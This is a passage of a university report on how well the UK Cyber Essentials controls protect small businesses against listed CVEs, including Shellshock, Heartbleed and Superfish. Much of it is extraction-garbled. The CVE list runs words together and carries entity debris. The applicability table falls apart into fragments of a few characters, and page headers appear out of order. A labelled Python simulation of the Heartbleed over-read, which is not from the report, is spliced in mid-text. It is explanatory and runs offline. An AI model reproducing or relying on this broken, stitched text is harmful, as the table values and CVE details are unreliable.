CVE-2014-6105IBM Security Identity Manager 6x before6003 IF14 allows remote attackers toconduct clickjacking attacks via unspecifiedvectors
CVE-2014-6136IBM Security AppScan Standard 8x and 9xbefore 9011 FP1 supports unencryptedsessions which allows remote attackers toobtain sensitive information by sniffing thenetwork
CVE-2014-6164IBM WebSphere Application Server80x before 80010 and 85x before8554 allows remote attackers to spoofOpenID and OpenID Connect cookies andconsequently obtain sensitive informationvia a crafted URL
CVE-2014-6363rdquovbscriptdll in Microsoft VBScript 56through 58 as used with Internet Explorer6 through 11 and other products allowsremote attackers to execute arbitrarycode or cause a denial of service(memory corruption) via a crafted website aka rdquordquoVBScript Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6369rdquoMicrosoft Internet Explorer 9 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6378Juniper Junos 114 before R12-S4 121X44before D35 121X45 before D30 121X46before D25 121X47 before D10 122before R9 122X50 before D70 123 beforeR7 131 before R4 before S3 131X49before D55 131X50 before D30 132before R5 132X50 before D20 132X51before D26 and D30 132X52 before D15133 before R3 and 141 before R1 allowsremote attackers to cause a denial of service(router protocol daemon crash) via a craftedRSVP PATH message
CVE-2014-6487Unspecified vulnerability in the OracleIdentity Manager component in OracleFusion Middleware 11115 1111711121 and 11122 allows remoteauthenticated users to affect integrity viaunknown vectors related to End User SelfService
CVE-2014-7250The TCP stack in 43BSD Net2 as usedin FreeBSD 54 NetBSD possibly 20 andOpenBSD possibly 36 does not properlyimplement the session timer which allowsremote attackers to cause a denial of service(resource consumption) via crafted packets
CVE-2014-7927The SimplifiedLoweringDoLoadBufferfunction in compilersimplified-loweringccin Google V8 as used in Google Chromebefore 400221491 does not properlychoose an integer data type which allowsremote attackers to cause a denial ofservice (memory corruption) or possiblyhave unspecified other impact via craftedJavaScript code
CVE-2014-7945OpenJPEG before r2908 as used inPDFium in Google Chrome before400221491 allows remote attackersto cause a denial of service (out-of-boundsread) via a crafted PDF document relatedto j2kc jp2c and t2c
CVE-2014-8447Adobe Reader and Acrobat 10x before10113 and 11x before 11010 on Windows
and OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-8445 CVE-2014-8446 CVE-2014-8456CVE-2014-8458 CVE-2014-8459 CVE-2014-8461 and CVE-2014-9158
CVE-2014-8638The navigatorsendBeacon implementationin Mozilla Firefox before 350 FirefoxESR 31x before 314 Thunderbird before314 and SeaMonkey before 232 omitsthe CORS Origin header which allowsremote attackers to bypass intended CORSaccess-control checks and conduct cross-site request forgery (CSRF) attacks via acrafted web site
CVE-2014-8835rdquoThe xpc data get bytes function in libxpcin Apple OS X before 10102 does not verifythat a dictionaryrsquos Attributes key has thexpc data data type which allows attackersto execute arbitrary code by providing acrafted dictionary to sysmond related toan rdquordquoXPC type confusionrdquordquo issuerdquo
CVE-2014-9159Heap-based buffer overflow in AdobeReader and Acrobat 10x before 10113and 11x before 11010 on Windows andOS X allows attackers to execute arbitrarycode via unspecified vectors a differentvulnerability than CVE-2014-8457 and CVE-2014-8460
CVE-2014-9163Stack-based buffer overflow in Adobe FlashPlayer before 1300259 and 14x and 15xbefore 1500246 on Windows and OS Xand before 112202425 on Linux allowsattackers to execute arbitrary code viaunspecified vectors as exploited in the wildin December 2014
CVE-2014-9350rdquoTP-Link TL-WR740N 4 with firmware3170 Build 140520 3166 Build 130529and 3164 Build 130205 allows remoteattackers to cause a denial of service(httpd crash) via vectors involving ardquordquonewrdquordquo value in the isNew parameter toPingIframeRpmhtmrdquo
CVE-2014-9357Docker 132 allows remote attackers toexecute arbitrary code with root privilegesvia a crafted (1) image or (2) build in aDockerfile in an LZMA (xz) archive relatedto the chroot for archive extraction
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 26 of 28
Survey Responses
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 27 of 28
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 28 of 28
Figure 13 Adaptable Survey-Response Network
Typicality of Case-Study SMEs
Within the survey respondents' network, aspects of each of the interviewed SME networks are apparent.

The Finance SME network shares a local file server, as sensitive information needs to be kept and processed by the organisation. Any SME handling sensitive information will be likely to strongly consider using local file servers.

The Specialist SME shares with the survey respondents' data its use of SSH to connect remotely to services. SSH is an important tool for accessing sensitive data while at home, or data that is stored remotely from the workplace.

The Web Development SME requires employees to connect to many web servers remotely; the survey respondents match this case with the use of external web-hosting services. That being said, in the general case this server is more likely to be the SME's own web-hosting solution rather than a client's.

The Hotel Services SME represents a very basic local network, using only cloud-based services remotely. This is becoming an increasingly popular trend for SMEs, as cloud services are often easier to set up and cheaper to maintain. This is also representative of many SMEs with little-to-no online presence.
Analysis of Cyber Essentials on High Profile Vulnerabilities

The following sections detail three of the high-profile vulnerabilities to hit the popular media in late 2014 to early 2015.

These are of particular note as, while they may not be the most damaging of attack vectors (although some are very serious), they have caught the attention of the public, and SMEs would be under pressure to ensure that they were protected.

With this in mind, we analyse how effective the Cyber Essentials security controls are at tackling these high-profile vulnerabilities.
"ShellShock"

Also known by the name "BashDoor", Shellshock hit the news as it attacked the Linux server environment, and did so in a particularly effective manner.

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

CVE-2014-6271 [13]

The exploit allowed attackers to directly execute arbitrary shell commands on a compromised system by altering environment variables. However, the bug was not enough by itself to actually enable attackers to compromise a system, but allowed access via other services. While the exploit is only effective if the bash environment can be altered, the results can be devastating, as it lays bare the entire system to many other forms of attack.

The threat was particularly insidious for SMEs who used Linux/Unix-based servers for services (mail servers, as an example), as they would potentially have no idea that they had been compromised.
"Heartbleed"

Appearing in April 2014, the CVE-2014-0160 (aka "Heartbleed") bug allowed attackers to directly read the active memory of a target machine through a buffer over-read. This then allowed attackers to access private credentials (or indeed anything else) in the RAM of the target.

As described in the original CVE report:

The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

CVE-2014-0160 [12]

As OpenSSL is a core part of many applications and services, both in the open and closed source world, this vulnerability had the potential to damage a huge number of systems. At the time of release, various sources (including, for example, Netcraft [15]) reported that up to 17% of trusted SSL-certified servers were vulnerable to the attack.

Depending on how the SME in question operates, the threat this particular CVE posed (and indeed still poses, with as-yet-unupdated servers still online with the vulnerability) is difficult to discern. Obviously the vulnerability is serious, but the ability of individual SMEs to detect and correct this flaw will vary greatly depending on the individual deployments.

Larger companies with their own Linux/Unix servers may have been able to deploy the patched OpenSSL version as soon as the patch was available, but smaller businesses, or those with more cloud-based services, may not have access to the software running on the servers they use and may be at the mercy of the respective operators to implement the fix. Because of this, patch management only partially remedies this vulnerability, and other protection methods from the Cyber Essentials guidelines, such as securing configurations or controlling access, will have unknown effects.

It is vulnerabilities such as this that pose the greatest threat to SME networks, as the methods to fix the issue are often outside the control of the company, potentially leaving them vulnerable far longer than one would expect.
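To make the buffer over-read concrete, the following Python simulation is an added example (not code from this report or from OpenSSL) of Heartbeat handling before and after the 1.0.1g fix. The record layout follows RFC 6520; the process-memory model and the "private key" bytes sitting next to the record are constructed stand-ins.

```python
"""Simulation of the OpenSSL Heartbeat over-read (CVE-2014-0160) and the 1.0.1g check.

Constructed example: no network I/O and no real TLS. "Process memory" is a bytearray
that models the received record followed by unrelated heap contents.
"""
import struct
from typing import Optional

HEARTBEAT_REQUEST = 1
HEARTBEAT_RESPONSE = 2
HEADER_LEN = 3      # type (1 byte) + payload_length (2 bytes), RFC 6520
PADDING_LEN = 16    # minimum padding that must follow the payload


def build_heartbeat(payload: bytes, claimed_length: Optional[int] = None) -> bytes:
    """Encode a HeartbeatRequest. `claimed_length` lets a test write a payload_length
    into the header that disagrees with the bytes actually present (the Heartbleed trigger)."""
    length = len(payload) if claimed_length is None else claimed_length
    return struct.pack("!BH", HEARTBEAT_REQUEST, length) + payload + b"\x00" * PADDING_LEN


class ProcessMemory:
    """Model of the heap around the record buffer: the record that arrived sits first,
    and whatever else the process holds (here a constructed stand-in for key material)
    sits immediately after it."""

    def __init__(self, record: bytes, neighbouring_data: bytes) -> None:
        self.buf = bytearray(record + neighbouring_data)
        self.record_length = len(record)   # what the TLS layer actually received


def _respond(mem: ProcessMemory, payload_len: int) -> bytes:
    # Mirrors the memcpy of payload_len bytes starting right after the header:
    # nothing here checks that those bytes belong to the record.
    payload = bytes(mem.buf[HEADER_LEN:HEADER_LEN + payload_len])
    return struct.pack("!BH", HEARTBEAT_RESPONSE, payload_len) + payload + b"\x00" * PADDING_LEN


def vulnerable_heartbeat_response(mem: ProcessMemory) -> bytes:
    """OpenSSL 1.0.1 before 1.0.1g: trusts payload_length from the packet and copies that
    many bytes, so a short record with a large claimed length echoes neighbouring memory."""
    _, payload_len = struct.unpack("!BH", mem.buf[:HEADER_LEN])
    return _respond(mem, payload_len)


def fixed_heartbeat_response(mem: ProcessMemory) -> Optional[bytes]:
    """1.0.1g: header + claimed payload + padding must fit inside the bytes that actually
    arrived; otherwise the message is silently dropped (None) and nothing is echoed."""
    if mem.record_length < HEADER_LEN + PADDING_LEN:   # too short to even carry a length
        return None
    _, payload_len = struct.unpack("!BH", mem.buf[:HEADER_LEN])
    if HEADER_LEN + payload_len + PADDING_LEN > mem.record_length:
        return None
    return _respond(mem, payload_len)


def response_payload(response: bytes) -> bytes:
    """The echoed payload of a HeartbeatResponse, i.e. what the peer gets back."""
    _, payload_len = struct.unpack("!BH", response[:HEADER_LEN])
    return response[HEADER_LEN:HEADER_LEN + payload_len]


def leaked_bytes(mem: ProcessMemory, response: bytes) -> bytes:
    """Portion of the echoed payload that lies beyond the record that was received."""
    payload = response_payload(response)
    in_record = max(0, mem.record_length - HEADER_LEN)
    return payload[in_record:]


def demo() -> dict:
    # Constructed neighbouring data: in a real server this could be key material.
    secret = b"-----BEGIN RSA PRIVATE KEY----- (constructed stand-in for key material)"
    honest = ProcessMemory(build_heartbeat(b"ping"), secret)
    lying = ProcessMemory(build_heartbeat(b"ping", claimed_length=60), secret)
    return {
        "honest_vulnerable": response_payload(vulnerable_heartbeat_response(honest)),
        "honest_fixed": response_payload(fixed_heartbeat_response(honest)),
        "lying_vulnerable_leak": leaked_bytes(lying, vulnerable_heartbeat_response(lying)),
        "lying_fixed": fixed_heartbeat_response(lying),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

The honest record is echoed identically by both versions; the record that claims 60 bytes but carries 4 makes the old code return 40 bytes of neighbouring memory, while the fixed code discards it.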
"Superfish"

The SDK for Komodia Redirector with SSL Digestor, as used in Lavasoft Ad-Aware Web Companion 1.1.885.1766 and Ad-Aware AdBlocker (alpha) 1.3.69.1, Qustodio for Windows, Atom Security Inc. StaffCop 5.8, and other products, uses the same X.509 certificate private key for a root CA certificate across different customers' installations, which makes it easier for man-in-the-middle attackers to spoof SSL servers by leveraging knowledge of this key, as originally reported for Superfish VisualDiscovery on certain Lenovo Notebook laptop products.

CVE-2015-2077 [14]

This vulnerability is particularly interesting as the software causing the issue was effectively brokered by a trusted hardware vendor, namely Lenovo. Because the issue was part of the 'normal configuration' for the equipment, it remained undetected for a long time, and hints that there may be further breaches in security as yet undiscovered in both Lenovo's and other manufacturers' equipment.

The vector is through the SuperFish software essentially breaking the chain of trust for SSL certificates by installing a self-signing certificate into the list of trusted certificates on the host machine. This allows an attacker to simply sign their own code via the same certificate, which itself can be easily gathered from any other machine running SuperFish, and they have full access to any SSL-secured connection from the target machine.

Thankfully, while the risks to users and SMEs were high, the fix is a simple one-time run of a removal tool provided by Lenovo themselves [11], and is mitigated fully through the Cyber Essentials patch management advice.
Threat Analysis

ShellShock: Without Cyber Essentials in place, SME 1 and 2 would be at risk from 'Shellshock', as they both operate Unix/Linux-based systems that would require patching to plug the security issue. The extent to which SMEs 3 and 4 are vulnerable to this issue is unclear, as their large dependency on outside service providers leaves them in a position where they are both unable to determine their vulnerability and additionally unable to remedy it.

With Cyber Essentials, SME 1 and 2 would be fully protected, and it is likely that SME 3 and 4 are also protected if the external providers also use Cyber Essentials or other security and patching schemes.

Heartbleed: The 'Heartbleed' bug is another vulnerability that, without Cyber Essentials guidelines being followed, would have laid companies' external-facing services open to malicious attackers.

In all cases, however, each SME can be fully protected with a combination of patch management, firewalling and application of access controls from the Cyber Essentials guidelines.

SuperFish: All of the SMEs we interviewed could be exceedingly vulnerable to the 'Superfish' issue without Cyber Essentials, as much of their operations revolve around SSL-encrypted communications. A break in the chain of trust for their certificates would allow an attacker to man-in-the-middle their communications.

Normal system updates would have failed to remedy the situation, as the fix provided by Lenovo consisted of a tool to be run in addition to the normal operating system patches. It is further debatable how effective Cyber Essentials patch management would have been in plugging this vulnerability, as it would require that the administrators be aware of the issue and know of the patch, rather than simply following 'normal' patching guidelines. Assuming that the persons responsible for the equipment are aware of the issue, however, then Cyber Essentials patch management fully mitigates this issue.
Conclusions

The Cyber Essentials security tools have been shown to mitigate, or to mitigate as soon as a patch is released, all vulnerabilities from remote attackers that do not exploit fundamentally insecure software or hardware. Of the two-hundred vulnerabilities collected, eight exploits were not able to be resolved with the deployment of security patches; for vulnerabilities such as these, the only mitigation available is simply not to install the compromised systems. To help prevent deployments being susceptible to attacks on faulty systems, it may be recommended that a blacklist of such items is composed for public reference.

Scope: It is important to consider that the scope of this study covers only internet-based, commodity-level attacks, and although the Cyber Essentials tools perform very well in mitigating these, this does not represent full security. There is an increasingly identified risk from insiders that also requires attention, not least malicious acts but also users unknowingly compromising security.

The SMEs interviewed represent organisations from a range of market sectors: web development and online presence, specialist scientific services, the hospitality industry and finance.
Additional Tools

The 10 Steps to Cyber Security [2] identifies additional security measures that support the Cyber Essentials Scheme well, to deliver additional security through indirect measures such as User Education and Awareness, along with Network and Systems Monitoring. These additional measures would serve to bolster cyber security by fortifying each employee of the SME with the necessary knowledge on safe practice, its importance and some basic technical understanding, just as they may be versed in environmental awareness. Network and Systems Monitoring allows remote user logins, as well as file access and activity, to be logged. For very small networks this may currently be infeasible, as the extra manpower or finances required for such a system are costly. However, for larger organisations additional monitoring capability should be explored as a future extension to Cyber Essentials, not just to identify and mitigate malicious action from more bespoke and sophisticated attacks than those reported on, but also to aid in providing evidence for any potential cyber-crime investigations.

There exist some collective approaches to improving cyber-security; a notable example of this is the Cyber-security Information Sharing Partnership (CiSP) [4]. The partnership aims to benefit all members by providing real-time updates on issues of cyber-security and discovered vulnerabilities, as well as best-practice guides and other cyber-threat information. It would be beneficial for more organisations to belong to cyber-security collectives like this, creating networks of informed individuals working together to tackle cyber-crime. This would be particularly useful to quickly identify potential vulnerabilities and possible patches, which, as shown in this report, is critical for the CE patch management security control to fully mitigate related vulnerabilities.

An important note to be made is toward the security of business affiliates and service providers. Even if an SME has Cyber Essentials in place, any use of cloud services relies on the vendor's security controls for threat mitigation. In other words, cloud email, accounting and any other cloud-based or remote services are only as secure as the service provider makes them. In general, cloud providers should be holding a high level of scrutiny to their security practice, and should be encouraged to certify their protection. Hewlett-Packard (HP) has taken this further and has begun to strengthen its entire supply chain (600 SMEs) with the Cyber Essentials accreditation. This provides protection across the entirety of Hewlett-Packard's operations as well as its affiliates. This should be a goal for organisations of all sizes, minimising the risk from cyber-threats by ensuring all trading partners uphold the same high levels of security.
Cyber Essentials Controls

Of the five current Cyber Essentials Controls, Patch Management was considered to aid in the mitigation of the highest proportion of remote attacks (87.5%); counter-intuitively, the survey responses had patch management ranked last in use for SMEs. The most widely used controls could be seen as those providing the most intuitive or easily understood protection: data loss prevention, strong passwords and firewall. Patch management, meanwhile, isn't necessarily understood by individuals as a tool to greatly improve cyber-security.

Anti-Malware was useful in mitigating the fewest (10%) vulnerabilities. It is, however, important to note that Anti-Malware is largely the only security tool that may routinely scan the network hardware and software, as well as any items downloaded from the internet or as email attachments. This serves as a last line of defence and, as such, is vital to an organisation's cyber-safety.
Recommendations

To further improve cyber-security across the UK, we recommend that:

1. Collective approaches to cyber security should be further encouraged. In particular, a governmental/collective approach to identifying inherently flawed products should be developed. This could be in addition to, or as an extension to, current initiatives like CiSP, which can make a difference in detecting and reacting to potential vulnerabilities in a timely manner.

2. Further research into the mitigation of other cyber-threats is carried out, to explore the risk from insider threats and targeted attacks.

3. Further employee education is strongly encouraged, especially to be able to tackle these other types of attacks mentioned above, which were not under the scope of this report.
References

[1] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, and Department for Business, Innovation and Skills. Cyber security guidance for business. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[2] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, and Department for Business, Innovation & Skills. 10 steps to cyber security. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[3] CESG, UK Trade & Investment, Prime Minister's Office, 10 Downing Street, Centre for the Protection of National Infrastructure, Government Communications Headquarters, and Department for Business, Innovation and Skills. Cyber security boost for UK firms. https://www.gov.uk/government/news/cyber-security-boost-for-uk-firms, January 2015.

[4] Centre for the Protection of National Infrastructure, CiSP, CERT-UK, and Department for Business, Innovation & Skills. Cyber-security information sharing partnership (CiSP). https://www.cert.gov.uk/cisp/, March 2013.

[5] CREST. Cyber essentials certified companies. http://www.cyberessentials.org/list/, March 2015.

[6] CVE.Mitre.org. Terminology - mitre.org. http://cve.mitre.org/about/terminology.html.

[7] Cyber Essentials. Cyber essentials scheme - overview. https://www.gov.uk/government/publications/cyber-essentials-scheme-overview.

[8] CESG, Cabinet Office, Centre for the Protection of National Infrastructure, and Department for Business, Innovation & Skills. Common cyber attacks: Reducing the impact. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400106/Common_Cyber_Attacks-Reducing_The_Impact.pdf, January 2015.

[9] UK Cyber Security Forum. North west cyber security cluster. http://www.ukcybersecurityforum.com/index.php/cyber-security-clusters/north-west-‘-cluster, 2015.

[10] HM Government. Cyber essentials certified companies. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400914/bis-15-72-cyber-essentials-scheme-assurance-framework.pdf, January 2015.

[11] Lenovo. Superfish uninstall instructions. http://support.lenovo.com/us/en/product_security/superfish_uninstall.

[12] Mitre.org. CVE-2014-0160 aka Heartbleed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160, 2014.

[13] Mitre.org. CVE-2014-6271 aka ShellShock. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271, 2014.

[14] Mitre.org. CVE-2015-2077 aka Superfish. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2077, 2015.

[15] Netcraft. Half a million widely trusted websites vulnerable to Heartbleed bug. http://news.netcraft.com/archives/2014/04/08/half-a-million-widely-trusted-websites-vulnerable-to-heartbleed-bug.html, April 2014.

[16] Cabinet Office. The UK cyber security strategy: protecting and promoting the UK in a digital world. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/60961/uk-cyber-security-strategy-final.pdf, November 2011.

[17] Cabinet Office and The Rt Hon Francis Maude MP. Government mandates new cyber security standard for suppliers. https://www.gov.uk/government/news/government-mandates-new-cyber-security-standard-for-suppliers, September 2014.
Cyber Controls Applicability

CVE            SME 1  SME 2  SME 3  SME 4  Idealised  No CE          With CE
CVE-2013-0008  y      y      y      y      y          Not Mitigated  Mitigated - Firewall, Secure Configuration (User Policy), Anti-Malware
CVE-2013-0022  y      n      y      y      n          Not Mitigated  Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0084  y      y      y      n      y          Not Mitigated  Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0140  y      n      n      n      n          Not Mitigated  Partially Mitigated - Patch Management
CVE-2013-0149  n      n      n      n      n          Not Mitigated  Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-0172  y      n      n      n      n          Not Mitigated  Mitigated - User Access (Strong Password), Patch Management
CVE-2013-0174  n      n      n      n      n          Not Mitigated  Mitigated - Access Policy (Strong Password), Firewall, Patch Management
CVE-2013-0199  y      n      n      n      n          Not Mitigated  Mitigated - Patch Management & Secure Configuration
CVE-2013-0253  n      n      y      n      n          Not Mitigated  Mitigated - Patch Management, Secure Configuration (Secure Server)
CVE-2013-0270  n      n      n      n      n          Not Mitigated  Partially Mitigated - Patch Management
CVE-2013-0481  n      n      n      n      n          Not Mitigated  Partially Mitigated - Patch Management
CVE-2013-0598  n      n      n      n      n          Not Mitigated  Partially Mitigated - Patch Management
CVE-2013-0619  y      y      y      y      y          Not Mitigated  Partially Mitigated - Patch Management
CVE-2013-0633  y      y      y      y      y          Not Mitigated  Mitigated - Firewall, Secure Configuration (Secure Browsing), Firmware Management
CVE-2013-0649  y      y      y      y      y          Not Mitigated  Mitigated - Firewall, Secure Configuration (Secure Browsing), Patch Management
CVE-2013-0746  y      y      y      y      y          Not Mitigated  Partially Mitigated - Patch Management
CVE-2013-0753  y      y      y      y      y          Not Mitigated  Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0787  y      y      y      y      n          Not Mitigated  Mitigated - Patch Management
CVE-2013-0909  y      y      y      y      y          Not Mitigated  Partially Mitigated - Patch Management
CVE-2013-1035  y      y      y      y      n          Not Mitigated  Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-1102  n      n      n      n      n          Not Mitigated  Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-1140  n      n      n      n      n          Not Mitigated  Not Mitigated - Secure Configuration (Don't install)
CVE-2013-1144  n      n      n      n      n          Not Mitigated  Partially Mitigated - Patch Management & Firewall
CVE-2013-1153  y      n      n      n      n          Not Mitigated  Partially Mitigated - Patch Management, Secure Configuration
CVE-2013-1181  n      n      n      n      n          Not Mitigated  Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-1303  y      n      y      y      n          Not Mitigated  Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-1384  y      y      y      y      n          Not Mitigated  Partially Mitigated - Patch Management, Secure Configuration (Secure Browser)
CVE-2013-1388  n      n      n      n      n          Not Mitigated  Partially Mitigated - Patch Management, Secure Configuration
CVE-2013-1450  y      n      y      y      n          Not Mitigated  Mitigated - Secure Configuration, Patch Management
CVE-2013-1472  y      y      y      y      n          Not Mitigated  Partially Mitigated - Patch Management, Secure Configuration (Access Policy)
CVE-2013-1553  y      n      y      y      n          Not Mitigated  Partially Mitigated - Patch Management
CVE-2013-1620  y      y      y      y      n          Not Mitigated  Partially Mitigated - Patch Management & Firewall
CVE-2013-1627  n      n      n      n      n          Not Mitigated  Partially Mitigated - Patch Management
CVE-2013-1638  y      y      y      y      n          Not Mitigated  Partially Mitigated - Patch Management
CVE-2013-1669  y      y      y      y      y          Not Mitigated  Partially Mitigated - Patch Management
CVE-2013-1
67
6y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
70
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
13
-17
34
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-17
77
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-23
19
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
C
VE
-20
13
-23
40
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 14 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-2
35
0n
yn
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-2
49
2y
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-25
07
yn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Fir
mw
are
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
3-2
73
6y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-2
78
0n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-28
03
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
Pat
chM
anag
emen
tsC
VE
-20
13
-28
24
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-2
82
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-29
20
ny
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-30
64
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
16
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
37
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eS
ecu
reC
on
fig
ura
tio
n(D
on
rsquotIn
stal
l)C
VE
-20
13
-31
94
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
99
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
01
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
06
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
80
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-3
38
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-34
17
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-3
63
2y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Acc
ess
Po
licy
(Str
on
gP
assw
ord
)F
irew
all
CV
E-2
01
3-3
65
6n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
85
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
An
ti-M
alw
are
CV
E-2
01
3-3
86
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
89
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n-
no
JS
CV
E-2
01
3-3
89
7y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-39
00
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-3
90
5y
yn
yn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-42
23
yn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-4
43
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
